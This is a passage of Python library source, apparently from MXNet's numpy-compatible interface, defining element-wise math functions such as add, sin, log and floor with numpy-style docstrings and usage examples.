>>> np.full((2, 2), 10)
array([[10., 10.],
[10., 10.]])
>>> np.full((2, 2), 2, dtype=np.int32, ctx=mx.cpu(0))
array([[2, 2],
[2, 2]], dtype=int32)
"""
return _mx_nd_np.full(shape, fill_value, order=order, ctx=ctx, dtype=dtype, out=out)
@set_module('mxnet.numpy')
def add(x1, x2, out=None):
"""Add arguments element-wise.
Parameters
----------
x1, x2 : ndarrays or scalar values
The arrays to be added. If x1.shape != x2.shape, they must be broadcastable to
a common shape (which may be the shape of one or the other).
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
add : ndarray or scalar
The sum of x1 and x2, element-wise. This is a scalar if both x1 and x2 are scalars.
"""
return _mx_nd_np.add(x1, x2, out)
@set_module('mxnet.numpy')
def subtract(x1, x2, out=None):
"""Subtract arguments element-wise.
Parameters
----------
x1, x2 : ndarrays or scalar values
The arrays to be subtracted from each other. If x1.shape != x2.shape,
they must be broadcastable to a common shape (which may be the shape
of one or the other).
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
subtract : ndarray or scalar
The difference of x1 and x2, element-wise. This is a scalar if both x1 and x2 are scalars.
"""
return _mx_nd_np.subtract(x1, x2, out)
@set_module('mxnet.numpy')
def multiply(x1, x2, out=None):
"""Multiply arguments element-wise.
Parameters
----------
x1, x2 : ndarrays or scalar values
The arrays to be multiplied. If x1.shape != x2.shape, they must be broadcastable to
a common shape (which may be the shape of one or the other).
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
out : ndarray or scalar
The difference of x1 and x2, element-wise. This is a scalar if both x1 and x2 are scalars.
"""
return _mx_nd_np.multiply(x1, x2, out)
@set_module('mxnet.numpy')
def divide(x1, x2, out=None):
"""Returns a true division of the inputs, element-wise.
Parameters
----------
x1 : ndarray or scalar
Dividend array.
x2 : ndarray or scalar
Divisor array.
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
out : ndarray or scalar
This is a scalar if both x1 and x2 are scalars.
"""
return _mx_nd_np.divide(x1, x2, out=out)
@set_module('mxnet.numpy')
def mod(x1, x2, out=None):
"""Return element-wise remainder of division.
Parameters
----------
x1 : ndarray or scalar
Dividend array.
x2 : ndarray or scalar
Divisor array.
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
out : ndarray or scalar
This is a scalar if both x1 and x2 are scalars.
"""
return _mx_nd_np.mod(x1, x2, out=out)
@set_module('mxnet.numpy')
def remainder(x1, x2, out=None):
"""Return element-wise remainder of division.
Parameters
----------
x1 : ndarray or scalar
Dividend array.
x2 : ndarray or scalar
Divisor array.
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
out : ndarray or scalar
This is a scalar if both x1 and x2 are scalars.
"""
return _mx_nd_np.remainder(x1, x2, out=out)
@set_module('mxnet.numpy')
def power(x1, x2, out=None):
"""First array elements raised to powers from second array, element-wise.
Parameters
----------
x1 : ndarray or scalar
The bases.
x2 : ndarray or scalar
The exponent.
out : ndarray
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array
is returned.
Returns
-------
out : ndarray or scalar
The bases in x1 raised to the exponents in x2.
This is a scalar if both x1 and x2 are scalars.
"""
return _mx_nd_np.power(x1, x2, out=out)
@set_module('mxnet.numpy')
def sin(x, out=None, **kwargs):
r"""Trigonometric sine, element-wise.
Parameters
----------
x : ndarray or scalar
Angle, in radians (:math:`2 \pi` rad equals 360 degrees).
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs broadcast to. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output is the same as that of the input if the input is an ndarray.
Returns
-------
y : ndarray or scalar
The sine of each element of x. This is a scalar if `x` is a scalar.
Notes
----
This function only supports input type of float.
"""
return _mx_nd_np.sin(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def cos(x, out=None, **kwargs):
r"""Cosine, element-wise.
Parameters
----------
x : ndarray or scalar
Angle, in radians (:math:`2 \pi` rad equals 360 degrees).
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs broadcast to. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output is the same as that of the input if the input is an ndarray.
Returns
-------
y : ndarray or scalar
The corresponding cosine values. This is a scalar if x is a scalar.
Notes
----
This function only supports input type of float.
"""
return _mx_nd_np.cos(x, out=out, **kwargs)
def sinh(x, out=None, **kwargs):
"""Hyperbolic sine, element-wise.
Equivalent to ``1/2 * (np.exp(x) - np.exp(-x))`` or ``-1j * np.sin(1j*x)``.
Parameters
----------
x : ndarray or scalar
Input array or scalar.
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs broadcast to. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output is the same as that of the input if the input is an ndarray.
Returns
-------
y : ndarray or scalar
The corresponding hyperbolic sine values. This is a scalar if `x` is a scalar.
Notes
----
This function only supports input type of float.
"""
return _mx_nd_np.sinh(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def cosh(x, out=None, **kwargs):
"""Hyperbolic cosine, element-wise.
Equivalent to ``1/2 * (np.exp(x) + np.exp(-x))`` and ``np.cos(1j*x)``.
Parameters
----------
x : ndarray or scalar
Input array or scalar.
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs broadcast to. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output is the same as that of the input if the input is an ndarray.
Returns
-------
y : ndarray or scalar
The corresponding hyperbolic cosine values. This is a scalar if `x` is a scalar.
Notes
----
This function only supports input type of float.
"""
return _mx_nd_np.cosh(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def tanh(x, out=None, **kwargs):
"""
Compute hyperbolic tangent element-wise.
Equivalent to ``np.sinh(x)/np.cosh(x)``.
Parameters
----------
x : ndarray or scalar.
Input array.
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs fill into. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output and input must be the same.
Returns
----------
y : ndarray or scalar
The corresponding hyperbolic tangent values.
Notes
-----
If `out` is provided, the function writes the result into it,
and returns a reference to `out`. (See Examples)
- input x does not support complex computation (like imaginary number)
>>> np.tanh(np.pi*1j)
TypeError: type <type 'complex'> not supported
Examples
--------
>>> np.tanh(np.array[0, np.pi]))
array([0. , 0.9962721])
>>> np.tanh(np.pi)
0.99627207622075
>>> # Example of providing the optional output parameter illustrating
>>> # that what is returned is a reference to said parameter
>>> out1 = np.array(1)
>>> out2 = np.tanh(np.array(0.1), out1)
>>> out2 is out1
True
>>> # Example of ValueError due to provision of shape mis-matched `out`
>>> np.tanh(np.zeros((3,3)),np.zeros((2,2)))
mxnet.base.MXNetError:
[07:17:36] ../src/ndarray/./../operator/tensor/../elemwise_op_common.h:135:
Check failed: assign(&dattr, vec.at(i)): Incompatible attr in node
at 0-th output: expected [3,3], got [2,2]
"""
return _mx_nd_np.tanh(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def log10(x, out=None, **kwargs):
"""Return the base 10 logarithm of the input array, element-wise.
Parameters
----------
x : ndarray or scalar
Input array or scalar.
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs broadcast to. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output is the same as that of the input if the input is an ndarray.
Returns
-------
y : ndarray or scalar
The logarithm to the base 10 of `x`, element-wise. NaNs are
returned where x is negative. This is a scalar if `x` is a scalar.
Notes
----
This function only supports input type of float.
"""
return _mx_nd_np.log10(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def sqrt(x, out=None, **kwargs):
"""
Return the non-negative square-root of an array, element-wise.
Parameters
----------
x : ndarray or scalar
The values whose square-roots are required.
out : ndarray, or None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
y : ndarray or scalar
An array of the same shape as `x`, containing the positive
square-root of each element in `x`. This is a scalar if `x` is a scalar.
Notes
----
This function only supports input type of float.
"""
return _mx_nd_np.sqrt(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def cbrt(x, out=None, **kwargs):
"""
Return the cube-root of an array, element-wise.
Parameters
----------
x : ndarray
The values whose cube-roots are required.
out : ndarray, optional
A location into which the result is stored. If provided, it must have a shape that the
inputs broadcast to. If not provided or None, a freshly-allocated array is returned.
A tuple (possible only as a keyword argument) must have length equal to the number of outputs.
Returns
----------
y : ndarray
An array of the same shape as x, containing the cube cube-root of each element in x.
If out was provided, y is a reference to it. This is a scalar if x is a scalar.
Examples
----------
>>> np.cbrt([1,8,27])
array([ 1., 2., 3.])
"""
return _mx_nd_np.cbrt(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def abs(x, out=None, **kwargs):
r"""abs(x, out=None, **kwargs)
Calculate the absolute value element-wise.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
absolute : ndarray
An ndarray containing the absolute value of
each element in `x`. This is a scalar if `x` is a scalar.
Examples
--------
>>> x = np.array([-1.2, 1.2])
>>> np.abs(x)
array([1.2, 1.2])
"""
return _mx_nd_np.abs(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def absolute(x, out=None, **kwargs):
"""
Calculate the absolute value element-wise.
np.abs is a shorthand for this function.
Parameters
----------
x : ndarray
Input array.
out : ndarray, optional
A location into which the result is stored. If provided, it must have a shape
that the inputs broadcast to. If not provided or None, a freshly-allocated array is returned.
A tuple (possible only as a keyword argument) must have length equal to the number of outputs.
Returns
----------
absolute : ndarray
An ndarray containing the absolute value of each element in x.
Examples
----------
>>> x = np.array([-1.2, 1.2])
>>> np.absolute(x)
array([ 1.2, 1.2])
"""
return _mx_nd_np.absolute(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def exp(x, out=None, **kwargs):
r"""exp(x, out=None, **kwargs)
Calculate the exponential of all elements in the input array.
Parameters
----------
x : ndarray or scalar
Input values.
out : ndarray or None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
Output array, element-wise exponential of `x`.
This is a scalar if `x` is a scalar.
Examples
--------
>>> np.exp(1)
2.718281828459045
>>> x = np.array([-1, 1, -2, 2])
>>> np.exp(x)
array([0.36787945, 2.7182817 , 0.13533528, 7.389056 ])
"""
return _mx_nd_np.exp(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def expm1(x, out=None, **kwargs):
r"""expm1(x, out=None, **kwargs)
Calculate `exp(x) - 1` for all elements in the array.
Parameters
----------
x : ndarray or scalar
Input values.
out : ndarray or None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
Output array, element-wise exponential minus one: `out = exp(x) - 1`.
This is a scalar if `x` is a scalar.
Examples
--------
>>> np.expm1(1)
1.718281828459045
>>> x = np.array([-1, 1, -2, 2])
>>> np.exp(x)
array([-0.63212056, 1.71828183, -0.86466472, 6.3890561])
"""
return _mx_nd_np.expm1(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def arcsin(x, out=None, **kwargs):
r"""
arcsin(x, out=None)
Inverse sine, element-wise.
Parameters
----------
x : ndarray or scalar
`y`-coordinate on the unit circle.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape as the input.
If not provided or None, a freshly-allocated array is returned.
Returns
-------
angle : ndarray or scalar
Output array is same shape and type as x. This is a scalar if x is a scalar.
The inverse sine of each element in `x`, in radians and in the
closed interval ``[-pi/2, pi/2]``.
Examples
--------
>>> np.arcsin(1) # pi/2
1.5707963267948966
>>> np.arcsin(-1) # -pi/2
-1.5707963267948966
>>> np.arcsin(0)
0.0
Notes
-----
`arcsin` is a multivalued function: for each `x` there are infinitely
many numbers `z` such that :math:`sin(z) = x`. The convention is to
return the angle `z` whose real part lies in [-pi/2, pi/2].
For real-valued input data types, *arcsin* always returns real output.
For each value that cannot be expressed as a real number or infinity,
it yields ``nan`` and sets the `invalid` floating point error flag.
The inverse sine is also known as `asin` or sin^{-1}.
The output `ndarray` has the same `ctx` as the input `ndarray`.
This function differs from the original `numpy.arcsin
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.arcsin.html>`_ in
the following aspects:
- Only support ndarray or scalar now.
- `where` argument is not supported.
- Complex input is not supported.
References
----------
Abramowitz, M. and Stegun, I. A., *Handbook of Mathematical Functions*,
10th printing, New York: Dover, 1964, pp. 79ff.
http://www.math.sfu.ca/~cbm/aands/
"""
return _mx_nd_np.arcsin(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def arccos(x, out=None, **kwargs):
"""
Trigonometric inverse cosine, element-wise.
The inverse of cos so that, if y = cos(x), then x = arccos(y).
Parameters
----------
x : ndarray
x-coordinate on the unit circle. For real arguments, the domain is [-1, 1].
out : ndarray, optional
A location into which the result is stored. If provided, it must have a shape that
the inputs broadcast to. If not provided or None, a freshly-allocated array is returned.
A tuple (possible only as a keyword argument) must have length equal to the number of outputs.
Returns
----------
angle : ndarray
The angle of the ray intersecting the unit circle at the given x-coordinate in radians [0, pi].
This is a scalar if x is a scalar.
See also
----------
cos, arctan, arcsin
Notes
----------
arccos is a multivalued function: for each x there are infinitely many numbers z such that
cos(z) = x. The convention is to return the angle z whose real part lies in [0, pi].
For real-valued input data types, arccos always returns real output.
For each value that cannot be expressed as a real number or infinity, it yields nan and sets
the invalid floating point error flag.
The inverse cos is also known as acos or cos^-1.
Examples
----------
We expect the arccos of 1 to be 0, and of -1 to be pi:
>>> np.arccos([1, -1])
array([ 0. , 3.14159265])
"""
return _mx_nd_np.arccos(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def arctan(x, out=None, **kwargs):
r"""arctan(x, out=None, **kwargs)
Trigonometric inverse tangent, element-wise.
The inverse of tan, so that if ``y = tan(x)`` then ``x = arctan(y)``.
Parameters
----------
x : ndarray or scalar
Input values.
out : ndarray or None, optional
A location into which the result is stored. If provided, it must have
a shape that the inputs broadcast to. If not provided or `None`,
a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
Out has the same shape as `x`. It lies is in
``[-pi/2, pi/2]`` (``arctan(+/-inf)`` returns ``+/-pi/2``).
This is a scalar if `x` is a scalar.
Notes
-----
`arctan` is a multi-valued function: for each `x` there are infinitely
many numbers `z` such that tan(`z`) = `x`. The convention is to return
the angle `z` whose real part lies in [-pi/2, pi/2].
For real-valued input data types, `arctan` always returns real output.
For each value that cannot be expressed as a real number or infinity,
it yields ``nan`` and sets the `invalid` floating point error flag.
For complex-valued input, we do not have support for them yet.
The inverse tangent is also known as `atan` or tan^{-1}.
Examples
--------
We expect the arctan of 0 to be 0, and of 1 to be pi/4:
>>> x = np.array([0, 1])
>>> np.arctan(x)
array([0. , 0.7853982])
>>> np.pi/4
0.7853981633974483
"""
return _mx_nd_np.arctan(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def sign(x, out=None):
"""
sign(x, out=None)
Returns an element-wise indication of the sign of a number.
The `sign` function returns ``-1 if x < 0, 0 if x==0, 1 if x > 0``. Only supports real number.
Parameters
----------
x : ndarray or a scalar
Input values.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
y : ndarray
The sign of `x`.
This is a scalar if `x` is a scalar.
Note
-------
- Only supports real number as input elements.
- Input type does not support Python native iterables(list, tuple, ...).
- ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output.
- ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output.
- ``out`` param does not support scalar input case.
Examples
--------
>>> a = np.array([-5., 4.5])
>>> np.sign(a)
array([-1., 1.])
Scalars as input:
>>> np.sign(4.0)
1.0
>>> np.sign(0)
0
Use ``out`` parameter:
>>> b = np.zeros((2, ))
>>> np.sign(a, out=b)
array([-1., 1.])
>>> b
array([-1., 1.])
"""
return _mx_nd_np.sign(x, out=out)
@set_module('mxnet.numpy')
def log(x, out=None, **kwargs):
"""
log(x, out=None)
Natural logarithm, element-wise.
The natural logarithm `log` is the inverse of the exponential function,
so that `log(exp(x)) = x`. The natural logarithm is logarithm in base
`e`.
Parameters
----------
x : ndarray
Input value. Elements must be of real value.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
y : ndarray
The natural logarithm of `x`, element-wise.
This is a scalar if `x` is a scalar.
Notes
-----
Currently only supports data of real values and ``inf`` as input. Returns data of real value, ``inf``, ``-inf`` and
``nan`` according to the input.
This function differs from the original `numpy.log
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.log.html>`_ in
the following aspects:
- Does not support complex number for now
- Input type does not support Python native iterables(list, tuple, ...).
- ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output.
- ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output.
- ``out`` param does not support scalar input case.
Examples
--------
>>> a = np.array([1, np.exp(1), np.exp(2), 0], dtype=np.float64)
>>> np.log(a)
array([ 0., 1., 2., -inf], dtype=float64)
Due to internal calculation mechanism, using default float32 dtype may cause some special behavior:
>>> a = np.array([1, np.exp(1), np.exp(2), 0])
>>> np.log(a)
array([ 0., 0.99999994, 2., -inf])
Scalar calculation:
>>> np.log(1)
0.0
"""
return _mx_nd_np.log(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def rint(x, out=None, **kwargs):
"""
Round elements of the array to the nearest integer.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None
A location into which the result is stored.
If provided, it must have the same shape and type as the input.
If not provided or None, a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
Output array is same shape and type as x. This is a scalar if x is a scalar.
Notes
-----
This function differs from the original `numpy.rint
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.rint.html>`_ in
the following way(s):
- only ndarray or scalar is accpted as valid input, tuple of ndarray is not supported
- broadcasting to `out` of different shape is currently not supported
- when input is plain python numerics, the result will not be stored in the `out` param
Examples
--------
>>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0])
>>> np.rint(a)
array([-2., -2., -0., 0., 1., 2., 2.])
"""
return _mx_nd_np.rint(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def log2(x, out=None, **kwargs):
"""
Base-2 logarithm of x.
Parameters
----------
x : ndarray or scalar
Input values.
out : ndarray or None
A location into which the result is stored.
If provided, it must have the same shape and type as the input.
If not provided or None, a freshly-allocated array is returned.
Returns
-------
y : ndarray
The logarithm base two of `x`, element-wise.
This is a scalar if `x` is a scalar.
Notes
-----
This function differs from the original `numpy.log2
<https://www.google.com/search?q=numpy+log2>`_ in
the following way(s):
- only ndarray or scalar is accpted as valid input, tuple of ndarray is not supported
- broadcasting to `out` of different shape is currently not supported
- when input is plain python numerics, the result will not be stored in the `out` param
Examples
--------
>>> x = np.array([0, 1, 2, 2**4])
>>> np.log2(x)
array([-inf, 0., 1., 4.])
"""
return _mx_nd_np.log2(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def log1p(x, out=None, **kwargs):
"""
Return the natural logarithm of one plus the input array, element-wise.
Calculates ``log(1 + x)``.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs fill into. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output and input must be the same.
Returns
-------
y : ndarray or scalar
Natural logarithm of 1 + x, element-wise. This is a scalar
if x is a scalar.
Notes
-----
For real-valued input, `log1p` is accurate also for `x` so small
that `1 + x == 1` in floating-point accuracy.
Logarithm is a multivalued function: for each `x` there is an infinite
number of `z` such that `exp(z) = 1 + x`. The convention is to return
the `z` whose imaginary part lies in `[-pi, pi]`.
For real-valued input data types, `log1p` always returns real output.
For each value that cannot be expressed as a real number or infinity,
it yields ``nan`` and sets the `invalid` floating point error flag.
cannot support complex-valued input.
Examples
--------
>>> np.log1p(1e-99)
1e-99
>>> a = np.array([3, 4, 5])
>>> np.log1p(a)
array([1.3862944, 1.609438 , 1.7917595])
"""
return _mx_nd_np.log1p(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def degrees(x, out=None, **kwargs):
"""
degrees(x, out=None)
Convert angles from radians to degrees.
Parameters
----------
x : ndarray
Input value. Elements must be of real value.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
y : ndarray
The corresponding degree values; if `out` was supplied this is a
reference to it.
This is a scalar if `x` is a scalar.
Notes
-------
This function differs from the original `numpy.degrees
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.degrees.html>`_ in
the following aspects:
- Input type does not support Python native iterables(list, tuple, ...). Only ndarray is supported.
- ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output.
- ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output.
- ``out`` param does not support scalar input case.
Examples
--------
Convert a radian array to degrees
>>> rad = np.arange(12.) * np.pi / 6
>>> np.degrees(rad)
array([ 0., 30., 60., 90., 120., 150., 180., 210., 240., 270., 300., 330.])
Use specified ``out`` ndarray:
>>> out = np.zeros((rad.shape))
>>> np.degrees(rad, out)
array([ 0., 30., 60., 90., 120., 150., 180., 210., 240., 270., 300., 330.])
>>> out
array([ 0., 30., 60., 90., 120., 150., 180., 210., 240., 270., 300., 330.])
"""
return _mx_nd_np.degrees(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def radians(x, out=None, **kwargs):
"""
Convert angles from degrees to radians.
Parameters
----------
x : ndarray or scalar
Input array in degrees.
out : ndarray or None
A location into which the result is stored.
If provided, it must have the same shape and type as the input.
If not provided or None, a freshly-allocated array is returned.
Returns
-------
y : ndarray
The corresponding radian values. This is a scalar if x is a scalar.
Notes
-----
This function differs from the original `numpy.radians
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.radians.html>`_ in
the following way(s):
- only ndarray or scalar is accpted as valid input, tuple of ndarray is not supported
- broadcasting to `out` of different shape is currently not supported
- when input is plain python numerics, the result will not be stored in the `out` param
Examples
--------
>>> deg = np.arange(12.) * 30.
>>> np.radians(deg)
array([0. , 0.5235988, 1.0471976, 1.5707964, 2.0943952, 2.6179938,
3.1415927, 3.6651914, 4.1887903, 4.712389 , 5.2359877, 5.7595863],
dtype=float32)
"""
return _mx_nd_np.radians(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def reciprocal(x, out=None, **kwargs):
r"""
reciprocal(x, out=None)
Return the reciprocal of the argument, element-wise.
Calculates ``1/x``.
Parameters
----------
x : ndarray or scalar
The values whose reciprocals are required.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape as the input.
If not provided or None, a freshly-allocated array is returned.
Returns
-------
y : ndarray or scalar
Output array is same shape and type as x. This is a scalar if x is a scalar.
Examples
--------
>>> np.reciprocal(2.)
0.5
>>> x = np.array([1, 2., 3.33])
>>> np.reciprocal(x)
array([1. , 0.5 , 0.3003003])
Notes
-----
.. note::
This function is not designed to work with integers.
For integer arguments with absolute value larger than 1 the result is
always zero because of the way Python handles integer division. For
integer zero the result is an overflow.
The output `ndarray` has the same `ctx` as the input `ndarray`.
This function differs from the original `numpy.reciprocal
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.reciprocal.html>`_ in
the following aspects:
- Only support ndarray and scalar now.
- `where` argument is not supported.
"""
return _mx_nd_np.reciprocal(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def square(x, out=None, **kwargs):
r"""
square(x, out=None)
Return the element-wise square of the input.
Parameters
----------
x : ndarray or scalar
The values whose squares are required.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape as the input.
If not provided or None, a freshly-allocated array is returned.
Returns
-------
y : ndarray or scalar
Output array is same shape and type as x. This is a scalar if x is a scalar.
Examples
--------
>>> np.square(2.)
4.0
>>> x = np.array([1, 2., -1])
>>> np.square(x)
array([1., 4., 1.])
Notes
-----
The output `ndarray` has the same `ctx` as the input `ndarray`.
This function differs from the original `numpy.square
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.square.html>`_ in
the following aspects:
- Only support ndarray and scalar now.
- `where` argument is not supported.
- Complex input is not supported.
"""
return _mx_nd_np.square(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def negative(x, out=None, where=True, **kwargs):
r"""
negative(x, out=None, where=True)
Numerical negative, element-wise.
Parameters:
------------
x : ndarray or scalar
Input array.
out : ndarray, None, or tuple of ndarray and None, optional
A location into which the result is stored.
If provided, it must have a shape that the inputs broadcast to.
If not provided or None, a freshly-allocated array is returned.
A tuple (possible only as a keyword argument) must have length
equal to the number of outputs.
where : ndarray, optional
Values of True indicate to calculate the ufunc at that position,
values of False indicate to leave the value in the output alone.
Returns:
-------
y : ndarray or scalar
Returned array or scalar: y = -x. This is a scalar if x is a scalar.
Examples:
--------
>>> np.negative(1)
-1
"""
return _mx_nd_np.negative(x, out=out)
@set_module('mxnet.numpy')
def fix(x, out=None):
"""
Round an array of floats element-wise to nearest integer towards zero.
The rounded values are returned as floats.
Parameters:
----------
x : ndarray
An array of floats to be rounded
out : ndarray, optional
Output array
Returns:
-------
y : ndarray or scalar
Returned array or scalar: y = -x. This is a scalar if x is a scalar.ndarray of floats
Examples:
---------
>>> np.fix(3.14)
3
"""
return _mx_nd_np.fix(x, out=out)
@set_module('mxnet.numpy')
def tan(x, out=None, where=True, **kwargs):
r"""
tan(x, out=None, where=True)
Compute tangent element-wise.
Equivalent to np.sin(x)/np.cos(x) element-wise.
Parameters:
----------
x : ndarray
Input array.
out : ndarray or none, optional
A location into which the result is stored. If provided,
it must have a shape that the inputs broadcast to. If not provided or None,
a freshly-allocated array is returned. A tuple (possible only as a keyword argument)
must have length equal to the number of outputs.
where : ndarray, optional
Values of True indicate to calculate the ufunc at that position,
values of False indicate to leave the value in the output alone.
Returns:
-------
y : ndarray
The corresponding tangent values. This is a scalar if x is a scalar.
Examples:
---------
>>> np.tan(0.5)
0.5463024898437905
"""
return _mx_nd_np.tan(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def ceil(x, out=None, **kwargs):
r"""
Return the ceiling of the input, element-wise.
The ceil of the ndarray `x` is the smallest integer `i`, such that
`i >= x`. It is often denoted as :math:`\lceil x \rceil`.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs fill into. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output and input must be the same.
Returns
-------
y : ndarray or scalar
The ceiling of each element in `x`, with `float` dtype.
This is a scalar if `x` is a scalar.
Examples
--------
>>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0])
>>> np.ceil(a)
array([-1., -1., -0., 1., 2., 2., 2.])
>>> #if you use parameter out, x and out must be ndarray. if not, you will get an error!
>>> a = np.array(1)
>>> np.ceil(np.array(3.5), a)
array(4.)
>>> a
array(4.)
"""
return _mx_nd_np.ceil(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def floor(x, out=None, **kwargs):
r"""
Return the floor of the input, element-wise.
The ceil of the ndarray `x` is the largest integer `i`, such that
`i <= x`. It is often denoted as :math:`\lfloor x \rfloor`.
Parameters
----------
x : ndarray or scalar
Input array.
out : ndarray or None
A location into which the result is stored. If provided, it
must have a shape that the inputs fill into. If not provided
or None, a freshly-allocated array is returned. The dtype of the
output and input must be the same.
Returns
-------
y : ndarray or scalar
The floor of each element in `x`, with `float` dtype.
This is a scalar if `x` is a scalar.
Examples
--------
>>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0])
>>> np.floor(a)
array([-2., -2., -1., 0., 1., 1., 2.])
>>> #if you use parameter out, x and out must be ndarray. if not, you will get an error!
>>> a = np.array(1)
>>> np.floor(np.array(3.5), a)
array(3.)
>>> a
array(3.)
"""
return _mx_nd_np.floor(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def trunc(x, out=None, **kwargs):
r"""
trunc(x, out=None)
Return the truncated value of the input, element-wise.
The truncated value of the scalar `x` is the nearest integer `i` which
is closer to zero than `x` is. In short, the fractional part of the
signed number `x` is discarded.
Parameters
----------
x : ndarray or scalar
Input data.
out : ndarray or None, optional
A location into which the result is stored.
Returns
-------
y : ndarray or scalar
The truncated value of each element in `x`.
This is a scalar if `x` is a scalar.
Notes
-----
This function differs from the original numpy.trunc in the following aspects:
- Do not support `where`, a parameter in numpy which indicates where to calculate.
- Cannot cast type automatically. Dtype of `out` must be same as the expected one.
- Cannot broadcast automatically. Shape of `out` must be same as the expected one.
- If `x` is plain python numeric, the result won't be stored in out.
Examples
--------
>>> a = np.array([-1.7, -1.5, -0.2, 0.2, 1.5, 1.7, 2.0])
>>> np.trunc(a)
array([-1., -1., -0., 0., 1., 1., 2.])
"""
return _mx_nd_np.trunc(x, out=out, **kwargs)
@set_module('mxnet.numpy')
def logical_not(x, out=None, **kwargs):
r"""
logical_not(x, out=None)
Compute the truth value of NOT x element-wise.
Parameters
----------
x : ndarray or scalar
Logical NOT is applied to the elements of `x`.
out : ndarray or None, optional
A location into which the result is stored.
Returns
-------
